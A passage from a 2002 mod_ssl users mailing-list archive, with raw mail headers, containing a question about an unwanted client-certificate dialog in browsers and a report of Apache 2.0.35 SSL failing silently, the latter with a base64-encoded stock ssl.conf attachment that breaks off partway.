Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gerald Richter" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I like to have an optional authetification with client certificates.
Everythings works well, except that the browser (IE 5.5) pops up a dialog
(which lists no certificates) also the client has no certificates installed.
Netscape 4.7 gives me an error message that there are no certificates
installed. After confiming these dialogs, everything works as excepted.

I have

SSLVerifyDepth 1
SSLVerifyClient optional

in my httpd.conf

Is there any chance to avoid this useless dialog?

Gerald

-------------------------------------------------------------
Gerald Richter    ecos electronic communication services gmbh
Internetconnect * Webserver/-design/-datenbanken * Consulting

Post:       Tulpenstrasse 5         D-55276 Dienheim b. Mainz
E-Mail:     richter@ecos.de         Voice:    +49 6133 925131
WWW:        http://www.ecos.de      Fax:      +49 6133 925152
-------------------------------------------------------------


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  2 21:49:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA20803; Mon, 2 Sep 2002 21:48:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA20786; Mon, 2 Sep 2002 21:47:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7AF6C4CE754; Mon,  2 Sep 2002 21:47:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4C04528680; Mon,  2 Sep 2002 21:46:46 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id VAA20515; Mon, 2 Sep 2002 21:26:14 +0200 (MET DST)
Received: (qmail 7733 invoked from network); 2 Sep 2002 19:26:24 -0000
Received: from unknown (HELO palantir) ([216.231.61.23]) (envelope-sender )
          by mail14.speakeasy.net (qmail-ldap-1.03) with DES-CBC3-SHA encrypted SMTP
          for ; 2 Sep 2002 19:26:24 -0000
Date: Mon, 2 Sep 2002 12:26:07 -0700 (PDT)
From: Paul English 
X-X-Sender: tallpaul@palantir
To: modssl-users@modssl.org
Subject: Apache 2.0.35 - ssl fails silently?
Message-ID: 
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-1463811583-1654559762-1030994767=:1434"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul English 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

---1463811583-1654559762-1030994767=:1434
Content-Type: TEXT/PLAIN; charset=US-ASCII


Hi,
	I'm working with a new setup of 2.0.35 under Linux, and having 
some trouble. I'm not sure where to look as there are no errors in 
error_log, or /var/log/messages or on the console. 

	Reading the docs I eliminated:
having Listen on port 443 and an appropriate virtual host context
using apachectl startssl to pass -DSSL to the server
tried using the stock httpd.conf and ssl.conf

None of the above seems to work. Thrown into the mix I have several 
interfaces on the machine, and ipchains (for which I've enabled access 
from everywhere to port 443). I tested all the interfaces using nmap, 
which just says that port 443 is closed, and telnet. 

I've attached my config files to see if anyone else can make sense of it.

Thanks,
Paul

---1463811583-1654559762-1030994767=:1434
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="ssl.conf"
Content-ID: 
Content-Description: 
Content-Disposition: attachment; filename="ssl.conf"
Content-Transfer-Encoding: BASE64

Iw0KIyBUaGlzIGlzIHRoZSBBcGFjaGUgc2VydmVyIGNvbmZpZ3VyYXRpb24g
ZmlsZSBwcm92aWRpbmcgU1NMIHN1cHBvcnQuDQojIEl0IGNvbnRhaW5zIHRo
ZSBjb25maWd1cmF0aW9uIGRpcmVjdGl2ZXMgdG8gaW5zdHJ1Y3QgdGhlIHNl
cnZlciBob3cgdG8NCiMgc2VydmUgcGFnZXMgb3ZlciBhbiBodHRwcyBjb25u
ZWN0aW9uLiBGb3IgZGV0YWlsaW5nIGluZm9ybWF0aW9uIGFib3V0IHRoZXNl
IA0KIyBkaXJlY3RpdmVzIHNlZSA8VVJMOmh0dHA6Ly9odHRwZC5hcGFjaGUu
b3JnL2RvY3MtMi4wL21vZC9tb2Rfc3NsLmh0bWw+DQojDQojICAgRm9yIHRo
ZSBtb21lbnQsIHNlZSA8VVJMOmh0dHA6Ly93d3cubW9kc3NsLm9yZy9kb2Nz
Lz4gZm9yIHRoaXMgaW5mby4gDQojICAgVGhlIGRvY3VtZW50cyBhcmUgc3Rp
bGwgYmVpbmcgcHJlcGFyZWQgZnJvbSBtYXRlcmlhbCBkb25hdGVkIGJ5IHRo
ZQ0KIyAgIG1vZHNzbCBwcm9qZWN0Lg0KIyANCiMgRG8gTk9UIHNpbXBseSBy
ZWFkIHRoZSBpbnN0cnVjdGlvbnMgaW4gaGVyZSB3aXRob3V0IHVuZGVyc3Rh
bmRpbmcNCiMgd2hhdCB0aGV5IGRvLiAgVGhleSdyZSBoZXJlIG9ubHkgYXMg
aGludHMgb3IgcmVtaW5kZXJzLiAgSWYgeW91IGFyZSB1bnN1cmUNCiMgY29u
c3VsdCB0aGUgb25saW5lIGRvY3MuIFlvdSBoYXZlIGJlZW4gd2FybmVkLiAg
DQojDQo8SWZEZWZpbmUgU1NMPg0KDQojICAgVW50aWwgZG9jdW1lbnRhdGlv
biBpcyBjb21wbGV0ZWQsIHBsZWFzZSBjaGVjayBodHRwOi8vd3d3Lm1vZHNz
bC5vcmcvDQojICAgZm9yIGFkZGl0aW9uYWwgY29uZmlnIGV4YW1wbGVzIGFu
ZCBtb2R1bGUgZG9jbWVudGF0aW9uLiAgRGlyZWN0aXZlcw0KIyAgIGFuZCBm
ZWF0dXJlcyBvZiBtb2Rfc3NsIGFyZSBsYXJnZWx5IHVuY2hhbmdlZCBmcm9t
IHRoZSBtb2Rfc3NsIHByb2plY3QNCiMgICBmb3IgQXBhY2hlIDEuMy4NCg0K
Iw0KIyBXaGVuIHdlIGFsc28gcHJvdmlkZSBTU0wgd2UgaGF2ZSB0byBsaXN0
ZW4gdG8gdGhlIA0KIyBzdGFuZGFyZCBIVFRQIHBvcnQgKHNlZSBhYm92ZSkg
YW5kIHRvIHRoZSBIVFRQUyBwb3J0DQojDQpMaXN0ZW4gMjA2LjI1My4xOTUu
MjEwOjQ0Mw0KDQojDQojIER5bmFtaWMgU2hhcmVkIE9iamVjdCAoRFNPKSBT
dXBwb3J0DQojDQojIFRvIGJlIGFibGUgdG8gdXNlIHRoZSBmdW5jdGlvbmFs
aXR5IG9mIGEgbW9kdWxlIHdoaWNoIHdhcyBidWlsdCBhcyBhIERTTyB5b3UN
CiMgICAgRXJyb3JMb2cgbG9ncy9kdW1teS1ob3N0LmV4YW1wbGUuY29tLWVy
cm9yX2xvZw0KIyAgICBDdXN0b21Mb2cgbG9ncy9kdW1teS1ob3N0LmV4YW1w
bGUuY29tLWFjY2Vzc19sb2cgY29tbW9uDQoNCiMjDQojIyAgU1NMIEdsb2Jh
bCBDb250ZXh0DQojIw0KIyMgIEFsbCBTU0wgY29uZmlndXJhdGlvbiBpbiB0
aGlzIGNvbnRleHQgYXBwbGllcyBib3RoIHRvDQojIyAgdGhlIG1haW4gc2Vy
dmVyIGFuZCBhbGwgU1NMLWVuYWJsZWQgdmlydHVhbCBob3N0cy4NCiMjDQoN
CiMNCiMgICBTb21lIE1JTUUtdHlwZXMgZm9yIGRvd25sb2FkaW5nIENlcnRp
ZmljYXRlcyBhbmQgQ1JMcw0KIw0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LXg1
MDktY2EtY2VydCAuY3J0DQpBZGRUeXBlIGFwcGxpY2F0aW9uL3gtcGtjczct
Y3JsICAgIC5jcmwNCg0KIyAgIFBhc3MgUGhyYXNlIERpYWxvZzoNCiMgICBD
b25maWd1cmUgdGhlIHBhc3MgcGhyYXNlIGdhdGhlcmluZyBwcm9jZXNzLg0K
IyAgIFRoZSBmaWx0ZXJpbmcgZGlhbG9nIHByb2dyYW0gKGBidWlsdGluJyBp
cyBhIGludGVybmFsDQojICAgdGVybWluYWwgZGlhbG9nKSBoYXMgdG8gcHJv
dmlkZSB0aGUgcGFzcyBwaHJhc2Ugb24gc3Rkb3V0Lg0KU1NMUGFzc1BocmFz
ZURpYWxvZyAgYnVpbHRpbg0KDQojICAgSW50ZXItUHJvY2VzcyBTZXNzaW9u
IENhY2hlOg0KIyAgIENvbmZpZ3VyZSB0aGUgU1NMIFNlc3Npb24gQ2FjaGU6
IEZpcnN0IHRoZSBtZWNoYW5pc20gDQojICAgdG8gdXNlIGFuZCBzZWNvbmQg
dGhlIGV4cGlyaW5nIHRpbWVvdXQgKGluIHNlY29uZHMpLg0KI1NTTFNlc3Np
b25DYWNoZSAgICAgICAgbm9uZQ0KI1NTTFNlc3Npb25DYWNoZSAgICAgICAg
c2htaHQ6bG9ncy9zc2xfc2NhY2hlKDUxMjAwMCkNCiNTU0xTZXNzaW9uQ2Fj
aGUgICAgICAgIHNobWNiOmxvZ3Mvc3NsX3NjYWNoZSg1MTIwMDApDQpTU0xT
ZXNzaW9uQ2FjaGUgICAgICAgICBkYm06bG9ncy9zc2xfc2NhY2hlDQpTU0xT
ZXNzaW9uQ2FjaGVUaW1lb3V0ICAzMDANCg0KIyAgIFNlbWFwaG9yZToNCiMg
ICBDb25maWd1cmUgdGhlIHBhdGggdG8gdGhlIG11dHVhbCBleGNsdXNpb24g
c2VtYXBob3JlIHRoZQ0KIyAgIFNTTCBlbmdpbmUgdXNlcyBpbnRlcm5hbGx5
IGZvciBpbnRlci1wcm9jZXNzIHN5bmNocm9uaXphdGlvbi4gDQpTU0xNdXRl
eCAgZmlsZTpsb2dzL3NzbF9tdXRleA0KDQojICAgUHNldWRvIFJhbmRvbSBO
dW1iZXIgR2VuZXJhdG9yIChQUk5HKToNCiMgICBDb25maWd1cmUgb25lIG9y
IG1vcmUgc291cmNlcyB0byBzZWVkIHRoZSBQUk5HIG9mIHRoZSANCiMgICBT
U0wgbGlicmFyeS4gVGhlIHNlZWQgZGF0YSBzaG91bGQgYmUgb2YgZ29vZCBy
YW5kb20gcXVhbGl0eS4NCiMgICBXQVJOSU5HISBPbiBzb21lIHBsYXRmb3Jt
cyAvZGV2L3JhbmRvbSBibG9ja3MgaWYgbm90IGVub3VnaCBlbnRyb3B5DQoj
ICAgaXMgYXZhaWxhYmxlLiBUaGlzIG1lYW5zIHlvdSB0aGVuIGNhbm5vdCB1
c2UgdGhlIC9kZXYvcmFuZG9tIGRldmljZQ0KIyAgIGJlY2F1c2UgaXQgd291
bGQgbGVhZCB0byB2ZXJ5IGxvbmcgY29ubmVjdGlvbiB0aW1lcyAoYXMgbG9u
ZyBhcw0KIyAgIGl0IHJlcXVpcmVzIHRvIG1ha2UgbW9yZSBlbnRyb3B5IGF2
YWlsYWJsZSkuIEJ1dCB1c3VhbGx5IHRob3NlDQojICAgcGxhdGZvcm1zIGFk
ZGl0aW9uYWxseSBwcm92aWRlIGEgL2Rldi91cmFuZG9tIGRldmljZSB3aGlj
aCBkb2Vzbid0DQojICAgYmxvY2suIFNvLCBpZiBhdmFpbGFibGUsIHVzZSB0
aGlzIG9uZSBpbnN0ZWFkLiBSZWFkIHRoZSBtb2Rfc3NsIFVzZXINCiMgICBN
YW51YWwgZm9yIG1vcmUgZGV0YWlscy4NClNTTFJhbmRvbVNlZWQgc3RhcnR1
cCBidWlsdGluDQpTU0xSYW5kb21TZWVkIGNvbm5lY3QgYnVpbHRpbg0KI1NT
TFJhbmRvbVNlZWQgc3RhcnR1cCBmaWxlOi9kZXYvcmFuZG9tICA1MTINCiNT
U0xSYW5kb21TZWVkIHN0YXJ0dXAgZmlsZTovZGV2L3VyYW5kb20gNTEyDQoj
U1NMUmFuZG9tU2VlZCBjb25uZWN0IGZpbGU6L2Rldi9yYW5kb20gIDUxMg0K
I1NTTFJhbmRvbVNlZWQgY29ubmVjdCBmaWxlOi9kZXYvdXJhbmRvbSA1MTIN
Cg0KIyAgIExvZ2dpbmc6DQojICAgVGhlIGhvbWUgb2YgdGhlIGRlZGljYXRl
ZCBTU0wgcHJvdG9jb2wgbG9nZmlsZS4gRXJyb3JzIGFyZQ0KIyAgIGFkZGl0
aW9uYWxseSBkdXBsaWNhdGVkIGluIHRoZSBnZW5lcmFsIGVycm9yIGxvZyBm
aWxlLiAgUHV0DQojICAgdGhpcyBzb21ld2hlcmUgd2hlcmUgaXQgY2Fubm90
IGJlIHVzZWQgZm9yIHN5bWxpbmsgYXR0YWNrcyBvbg0KIyAgIGEgcmVhbCBz
ZXJ2ZXIgKGkuZS4gc29tZXdoZXJlIHdoZXJlIG9ubHkgcm9vdCBjYW4gd3Jp
dGUpLg0KIyAgIExvZyBsZXZlbHMgYXJlIChhc2NlbmRpbmcgb3JkZXI6IGhp
Z2hlciBvbmVzIGluY2x1ZGUgbG93ZXIgb25lcyk6DQojICAgbm9uZSwgZXJy
b3IsIHdhcm4sIGluZm8sIHRyYWNlLCBkZWJ1Zy4NClNTTExvZyAgICAgIGxv
Z3Mvc3NsX2VuZ2luZV9sb2cNClNTTExvZ0xldmVsIGluZm8NCg0KIyMNCiMj
IFNTTCBWaXJ0dWFsIEhvc3QgQ29udGV4dA0KIyMNCg0KPFZpcnR1YWxIb3N0
IDIwNi4yNTMuMTk1LjIxMDo0NDM+DQoNCiMgIEdlbmVyYWwgc2V0dXAgZm9y
IHRoZSB2aXJ0dWFsIGhvc3QNCkRvY3VtZW50Um9vdCAiL3Vzci9sb2NhbC9o
dGRvY3MvdGVzdCINClNlcnZlck5hbWUgM3RpZXJncm91cC5jb206NDQzDQpT
ZXJ2ZXJBZG1pbiBwc3RvcmNrQDN0aWVyZ3JvdXAuY29tDQpFcnJvckxvZyBs
b2dzL2Vycm9yX2xvZw0KVHJhbnNmZXJMb2cgbG9ncy9hY2Nlc3NfbG9nDQoN
CiMgICBTU0wgRW5naW5lIFN3aXRjaDoNCiMgICBFbmFibGUvRGlzYWJsZSBT
U0wgZm9yIHRoaXMgdmlydHVhbCBob3N0Lg0KU1NMRW5naW5lIG9uDQoNCiMg
ICBTU0wgQ2lwaGVyIFN1aXRlOg0KIyAgIExpc3QgdGhlIGNpcGhlcnMgdGhh
dCB0aGUgY2xpZW50IGlzIHBlcm1pdHRlZCB0byBuZWdvdGlhdGUuDQojICAg
U2VlIHRoZSBtb2Rfc3NsIGRvY3VtZW50YXRpb24gZm9yIGEgY29tcGxldGUg
bGlzdC4NClNTTENpcGhlclN1aXRlIEFMTDohQURIOiFFWFBPUlQ1NjpSQzQr
UlNBOitISUdIOitNRURJVU06K0xPVzorU1NMdjI6K0VYUDorZU5VTEwNCg0K
IyAgIFNlcnZlciBDZXJ0aWZpY2F0ZToNCiMgICBQb2ludCBTU0xDZXJ0aWZp
Y2F0ZUZpbGUgYXQgYSBQRU0gZW5jb2RlZCBjZXJ0aWZpY2F0ZS4gIElmDQoj
ICAgdGhlIGNlcnRpZmljYXRlIGlzIGVuY3J5cHRlZCwgdGhlbiB5b3Ugd2ls
bCBiZSBwcm9tcHRlZCBmb3IgYQ0KIyAgIHBhc3MgcGhyYXNlLiAgTm90ZSB0
aGF0IGEga2lsbCAtSFVQIHdpbGwgcHJvbXB0IGFnYWluLiBBIHRlc3QNCiMg
ICBjZXJ0aWZpY2F0ZSBjYW4gYmUgZ2VuZXJhdGVkIHdpdGggYG1ha2UgY2Vy
dGlmaWNhdGUnIHVuZGVyDQojICAgYnVpbHQgdGltZS4gS2VlcCBpbiBtaW5k
IHRoYXQgaWYgeW91J3ZlIGJvdGggYSBSU0EgYW5kIGEgRFNBDQojICAgY2Vy
dGlmaWNhdGUgeW91IGNhbiBjb25maWd1cmUgYm90aCBpbiBwYXJhbGxlbCAo
dG8gYWxzbyBhbGxvdw0KIyAgIHRoZSB1c2Ugb2YgRFNBIGNpcGhlcnMsIGV0
Yy4pDQpTU0xDZXJ0aWZpY2F0ZUZpbGUgL3Vzci9sb2NhbC9jb25mL3NzbC5j
cnQvc2VydmVyLmNydA0KI1NTTENlcnRpZmljYXRlRmlsZSAvdXNyL2xvY2Fs
L2NvbmYvc3NsLmNydC9zZXJ2ZXItZHNhLmNydA0KDQojICAgU2VydmVyIFBy
aXZhdGUgS2V5Og0KIyAgIElmIHRoZSBrZXkgaXMgbm90IGNvbWJpbmVkIHdp
dGggdGhlIGNlcnRpZmljYXRlLCB1c2UgdGhpcw0KIyAgIGRpcmVjdGl2ZSB0
byBwb2ludCBhdCB0aGUga2V5IGZpbGUuICBLZWVwIGluIG1pbmQgdGhhdCBp
Zg0KIyAgIHlvdSd2ZSBib3RoIGEgUlNBIGFuZCBhIERTQSBwcml2YXRlIGtl
eSB5b3UgY2FuIGNvbmZpZ3VyZQ0KIyAgIGJvdGggaW4gcGFyYWxsZWwgKHRv
IGFsc28gYWxsb3cgdGhlIHVzZSBvZiBEU0EgY2lwaGVycywgZXRjLikNClNT
TENlcnRpZmljYXRlS2V5RmlsZSAvdXNyL2xvY2FsL2NvbmYvc3NsLmtleS9z
ZXJ2ZXIua2V5DQojU1NMQ2VydGlmaWNhdGVLZXlGaWxlIC91c3IvbG9jYWwv
Y29uZi9zc2wua2V5L3NlcnZlci1kc2Eua2V5DQoNCiMgICBTZXJ2ZXIgQ2Vy
dGlmaWNhdGUgQ2hhaW46DQojICAgUG9pbnQgU1NMQ2VydGlmaWNhdGVDaGFp
bkZpbGUgYXQgYSBmaWxlIGNvbnRhaW5pbmcgdGhlDQojICAgY29uY2F0ZW5h
dGlvbiBvZiBQRU0gZW5jb2RlZCBDQSBjZXJ0aWZpY2F0ZXMgd2hpY2ggZm9y
bSB0aGUNCiMgICBjZXJ0aWZpY2F0ZSBjaGFpbiBmb3IgdGhlIHNlcnZlciBj
ZXJ0aWZpY2F0ZS4gQWx0ZXJuYXRpdmVseQ0KIyAgIHRoZSByZWZlcmVuY2Vk
IGZpbGUgY2FuIGJlIHRoZSBzYW1lIGFzIFNTTENlcnRpZmljYXRlRmlsZQ0K
IyAgIHdoZW4gdGhlIENBIGNlcnRpZmljYXRlcyBhcmUgZGlyZWN0bHkgYXBw
ZW5kZWQgdG8gdGhlIHNlcnZlcg0KIyAgIGNlcnRpZmljYXRlIGZvciBjb252
aW5pZW5jZS4NCiNTU0xDZXJ0aWZpY2F0ZUNoYWluRmlsZSAvdXNyL2xvY2Fs
L2NvbmYvc3NsLmNydC9jYS5jcnQNCg0KIyAgIENlcnRpZmljYXRlIEF1dGhv
cml0eSAoQ0EpOg0KIyAgIFNldCB0aGUgQ0EgY2VydGlmaWNhdGUgdmVyaWZp
Y2F0aW9uIHBhdGggd2hlcmUgdG8gZmluZCBDQQ0KIyAgIGNlcnRpZmljYXRl
cyBmb3IgY2xpZW50IGF1dGhlbnRpY2F0aW9uIG9yIGFsdGVybmF0aXZlbHkg
b25lDQojICAgaHVnZSBmaWxlIGNvbnRhaW5pbmcgYWxsIG9mIHRoZW0gKGZp
bGUgbXVzdCBiZSBQRU0gZW5jb2RlZCkNCiMgICBOb3RlOiBJbnNpZGUgU1NM
Q0FDZXJ0aWZpY2F0ZVBhdGggeW91IG5lZWQgaGFzaCBzeW1saW5rcw0KIyAg
ICAgICAgIHRvIHBvaW50IHRvIHRoZSBjZXJ0aWZpY2F0ZSBmaWxlcy4gVXNl
IHRoZSBwcm92aWRlZA0KIyAgICAgICAgIE1ha2VmaWxlIHRvIHVwZGF0ZSB0
aGUgaGFzaCBzeW1saW5rcyBhZnRlciBjaGFuZ2VzLg0KI1NTTENBQ2VydGlm
aWNhdGVQYXRoIC91c3IvbG9jYWwvY29uZi9zc2wuY3J0DQojU1NMQ0FDZXJ0
aWZpY2F0ZUZpbGUgL3Vzci9sb2NhbC9jb25mL3NzbC5jcnQvY2EtYnVuZGxl
LmNydA0KDQojICAgQ2VydGlmaWNhdGUgUmV2b2NhdGlvbiBMaXN0cyAoQ1JM
KToNCiMgICBTZXQgdGhlIENBIHJldm9jYXRpb24gcGF0aCB3aGVyZSB0byBm
aW5kIENBIENSTHMgZm9yIGNsaWVudA0KIyAgIGF1dGhlbnRpY2F0aW9uIG9y
IGFsdGVybmF0aXZlbHkgb25lIGh1Z2UgZmlsZSBjb250YWluaW5nIGFsbA0K
IyAgIG9mIHRoZW0gKGZpbGUgbXVzdCBiZSBQRU0gZW5jb2RlZCkNCiMgICBO
b3RlOiBJbnNpZGUgU1NMQ0FSZXZvY2F0aW9uUGF0aCB5b3UgbmVlZCBoYXNo
IHN5bWxpbmtzDQojICAgICAgICAgdG8gcG9pbnQgdG8gdGhlIGNlcnRpZmlj
YXRlIGZpbGVzLiBVc2UgdGhlIHByb3ZpZGVkDQojICAgICAgICAgTWFrZWZp
bGUgdG8gdXBkYXRlIHRoZSBoYXNoIHN5bWxpbmtzIGFmdGVyIGNoYW5nZXMu
DQojU1NMQ0FSZXZvY2F0aW9uUGF0aCAvdXNyL2xvY2FsL2NvbmYvc3NsLmNy
bA0KI1NTTENBUmV2b2NhdGlvbkZpbGUgL3Vzci9sb2NhbC9jb25mL3NzbC5j
cmwvY2EtYnVuZGxlLmNybA0KDQojICAgQ2xpZW50IEF1dGhlbnRpY2F0aW9u
IChUeXBlKToNCiMgICBDbGllbnQgY2VydGlmaWNhdGUgdmVyaWZpY2F0aW9u
IHR5cGUgYW5kIGRlcHRoLiAgVHlwZXMgYXJlDQojICAgbm9uZSwgb3B0aW9u
YWwsIHJlcXVpcmUgYW5kIG9wdGlvbmFsX25vX2NhLiAgRGVwdGggaXMgYQ0K
IyAgIG51bWJlciB3aGljaCBzcGVjaWZpZXMgaG93IGRlZXBseSB0byB2ZXJp
ZnkgdGhlIGNlcnRpZmljYXRlDQojICAgaXNzdWVyIGNoYWluIGJlZm9yZSBk
ZWNpZGluZyB0aGUgY2VydGlmaWNhdGUgaXMgbm90IHZhbGlkLg0KI1NTTFZl
cmlmeUNsaWVudCByZXF1aXJlDQojU1NMVmVyaWZ5RGVwdGggIDEwDQoNCiMg
ICBBY2Nlc3MgQ29udHJvbDoNCiMgICBXaXRoIFNTTFJlcXVpcmUgeW91IGNh
biBkbyBwZXItZGlyZWN0b3J5IGFjY2VzcyBjb250cm9sIGJhc2VkDQojICAg
b24gYXJiaXRyYXJ5IGNvbXBsZXggYm9vbGVhbiBleHByZXNzaW9ucyBjb250
YWluaW5nIHNlcnZlcg0KIyAgIHZhcmlhYmxlIGNoZWNrcyBhbmQgb3RoZXIg
bG9va3VwIGRpcmVjdGl2ZXMuICBUaGUgc3ludGF4IGlzIGENCiMgICBtaXh0
dXJlIGJldHdlZW4gQyBhbmQgUGVybC4gIFNlZSB0aGUgbW9kX3NzbCBkb2N1
bWVudGF0aW9uDQojICAgZm9yIG1vcmUgZGV0YWlscy4NCiM8TG9jYXRpb24g
Lz4NCiNTU0xSZXF1aXJlICggICAgJXtTU0xfQ0lQSEVSfSAhfiBtL14oRVhQ
fE5VTEwpLyBcDQojICAgICAgICAgICAgYW5kICV7U1NMX0NMSUVOVF9TX0RO
X099IGVxICJTbmFrZSBPaWwsIEx0ZC4iIFwNCiMgICAgICAgICAgICBhbmQg
JXtTU0xfQ0xJRU5UX1NfRE5fT1V9IGluIHsiU3RhZmYiLCAiQ0EiLCAiRGV2
In0gXA0KIyAgICAgICAgICAgIGFuZCAle1RJTUVfV0RBWX0gPj0gMSBhbmQg
JXtUSU1FX1dEQVl9IDw9IDUgXA0KIyAgICAgICAgICAgIGFuZCAle1RJTUVf
SE9VUn0gPj0gOCBhbmQgJXtUSU1FX0hPVVJ9IDw9IDIwICAgICAgICkgXA0K
IyAgICAgICAgICAgb3IgJXtSRU1PVEVfQUREUn0gPX4gbS9eMTkyXC43Nlwu
MTYyXC5bMC05XSskLw0KIzwvTG9jYXRpb24+DQoNCiMgICBTU0wgRW5naW5l
IE9wdGlvbnM6DQojICAgU2V0IHZhcmlvdXMgb3B0aW9ucyBmb3IgdGhlIFNT
TCBlbmdpbmUuDQojICAgbyBGYWtlQmFzaWNBdXRoOg0KIyAgICAgVHJhbnNs
YXRlIHRoZSBjbGllbnQgWC41MDkgaW50byBhIEJhc2ljIEF1dGhvcmlzYXRp
b24uICBUaGlzIG1lYW5zIHRoYXQNCiMgICAgIHRoZSBzdGFuZGFyZCBBdXRo
L0RCTUF1dGggbWV0aG9kcyBjYW4gYmUgdXNlZCBmb3IgYWNjZXNzIGNvbnRy
b2wuICBUaGUNCiMgICAgIHVzZXIgbmFtZSBpcyB0aGUgYG9uZSBsaW5lJyB2
ZXJzaW9uIG9mIHRoZSBjbGllbnQncyBYLjUwOSBjZXJ0aWZpY2F0ZS4NCiMg
ICAgIE5vdGUgdGhhdCBubyBwYXNzd29yZCBpcyBvYnRhaW5lZCBmcm9tIHRo
ZSB1c2VyLiBFdmVyeSBlbnRyeSBpbiB0aGUgdXNlcg0KIyAgICAgZmlsZSBu
ZWVkcyB0aGlzIHBhc3N3b3JkOiBgeHhqMzFaTVRaemtWQScuDQojICAgbyBF
eHBvcnRDZXJ0RGF0YToNCiMgICAgIFRoaXMgZXhwb3J0cyB0d28gYWRkaXRp
b25hbCBlbnZpcm9ubWVudCB2YXJpYWJsZXM6IFNTTF9DTElFTlRfQ0VSVCBh
bmQNCiMgICAgIFNTTF9TRVJWRVJfQ0VSVC4gVGhlc2UgY29udGFpbiB0aGUg
UEVNLWVuY29kZWQgY2VydGlmaWNhdGVzIG9mIHRoZQ0KIyAgICAgc2VydmVy
IChhbHdheXMgZXhpc3RpbmcpIGFuZCB0aGUgY2xpZW50IChvbmx5IGV4aXN0
aW5nIHdoZW4gY2xpZW50DQojICAgICBhdXRoZW50aWNhdGlvbiBpcyB1c2Vk
KS4gVGhpcyBjYW4gYmUgdXNlZCB0byBpbXBvcnQgdGhlIGNlcnRpZmljYXRl
cw0KIyAgICAgaW50byBDR0kgc2NyaXB0cy4NCiMgICBvIFN0ZEVudlZhcnM6
DQojICAgICBUaGlzIGV4cG9ydHMgdGhlIHN0YW5kYXJkIFNTTC9UTFMgcmVs
YXRlZCBgU1NMXyonIGVudmlyb25tZW50IHZhcmlhYmxlcy4NCiMgICAgIFBl
ciBkZWZhdWx0IHRoaXMgZXhwb3J0YXRpb24gaXMgc3dpdGNoZWQgb2ZmIGZv
ciBwZXJmb3JtYW5jZSByZWFzb25zLA0KIyAgICAgYmVjYXVzZSB0aGUgZXh0
cmFjdGlvbiBzdGVwIGlzIGFuIGV4cGVuc2l2ZSBvcGVyYXRpb24gYW5kIGlz
IHVzdWFsbHkNCiMgICAgIHVzZWxlc3MgZm9yIHNlcnZpbmcgc3RhdGljIGNv
bnRlbnQuIFNvIG9uZSB1c3VhbGx5IGVuYWJsZXMgdGhlDQojICAgICBleHBv
cnRhdGlvbiBmb3IgQ0dJIGFuZCBTU0kgcmVxdWVzdHMgb25seS4NCiMgICBv
IENvbXBhdEVudlZhcnM6DQojICAgICBUaGlzIGV4cG9ydHMgb2Jzb2xldGUg
ZW52aXJvbm1lbnQgdmFyaWFibGVzIGZvciBiYWNrd2FyZCBjb21wYXRpYmls
aXR5DQojICAgICB0byBBcGFjaGUtU1NMIDEueCwgbW9kX3NzbCAyLjAueCwg
U2lvdXggMS4wIGFuZCBTdHJvbmdob2xkIDIueC4gVXNlIHRoaXMNCiMgICAg
IHRvIHByb3ZpZGUgY29tcGF0aWJpbGl0eSB0byBleGlzdGluZyBDR0kgc2Ny
aXB0cy4NCiMgICBvIFN0cmljdFJlcXVpcmU6DQojICAgICBUaGlzIGRlbmll
cyBhY2Nlc3Mgd2hlbiAiU1NMUmVxdWlyZVNTTCIgb3IgIlNTTFJlcXVpcmUi
IGFwcGxpZWQgZXZlbg0KIyAgICAgdW5kZXIgYSAiU2F0aXNmeSBhbnkiIHNp
dHVhdGlvbiwgaS5lLiB3aGVuIGl0IGFwcGxpZXMgYWNjZXNzIGlzIGRlbmll
ZA0KIyAgICAgYW5kIG5vIG90aGVyIG1vZHVsZSBjYW4gY2hhbmdlIGl0Lg0K
IyAgIG8gT3B0UmVuZWdvdGlhdGU6DQojICAgICBUaGlzIGVuYWJsZXMgb3B0
aW1pemVkIFNTTCBjb25uZWN0aW9uIHJlbmVnb3RpYXRpb24gaGFuZGxpbmcg
d2hlbiBTU0wNCiMgICAgIGRpcmVjdGl2ZXMgYXJlIHVzZWQgaW4gcGVyLWRp
cmVjdG9yeSBjb250ZXh0LiANCiNTU0xPcHRpb25zICtGYWtlQmFzaWNBdXRo
ICtFeHBvcnRDZXJ0RGF0YSArQ29tcGF0RW52VmFycyArU3RyaWN0UmVxdWly
ZQ0KPEZpbGVzIH4gIlwuKGNnaXxzaHRtbHxwaHRtbHxwaHAzPykkIj4NCiAg
ICBTU0xPcHRpb25zICtTdGRFbnZWYXJzDQo8L0ZpbGVzPg0KPERpcmVjdG9y
eSAiL3Vzci9sb2NhbC9jZ2ktYmluIj4NCiAgICBTU0xPcHRpb25zICtTdGRF
bnZWYXJzDQo8L0RpcmVjdG9yeT4NCg0KIyAgIFNTTCBQcm90b2NvbCBBZGp1
c3RtZW50czoNCiMgICBUaGUgc2FmZSBhbmQgZGVmYXVsdCBidXQgc3RpbGwg
U1NML1RMUyBzdGFuZGFyZCBjb21wbGlhbnQgc2h1dGRvd24NCiMgICBhcHBy
